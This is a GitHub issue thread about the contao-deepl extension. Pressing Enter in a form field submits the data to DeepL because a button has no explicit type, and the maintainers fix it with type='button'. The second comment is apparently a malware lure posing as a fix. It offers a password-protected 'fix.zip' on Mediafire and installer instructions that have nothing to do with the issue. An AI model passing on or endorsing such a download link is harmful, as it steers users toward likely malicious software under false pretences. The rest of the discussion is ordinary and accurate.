### ISSUE TITLE
Enter key does not submit the edit form

### ISSUE THREAD

**Issue by aschempp** [numero2/contao-deepl#2]
If I press the enter key on a text field, it appears to submit the data to deepl instead of submitting the edit record in the back end. Is this intentional? It really confused me because I usually press enter if I just change a little text field 😅

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bennyborn** [comment]
Wow, nice feature but unfortunately not intentional 😁 Trying to figure out whats going on...

**Comment by bennyborn** [comment]
So according to [MDN](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/button) every button without a `type` set explicitly will be handled like `type="submit"`.

> If your buttons are not for submitting form data to a server, be sure to set their type attribute to button. Otherwise, they will try to submit form data and to load the (nonexistent) response, possibly destroying the current state of the document.

So as soon as you press enter on the input the browser will search for the first submit button to submit the form an that's where our translation handling come into play.

Will release a fixed version right now.

Thanks @aschempp

**Comment by aschempp** [comment]
I guess `type="button"` would solve the issue then?

**Comment by bennyborn** [comment]
It did, yes 😊
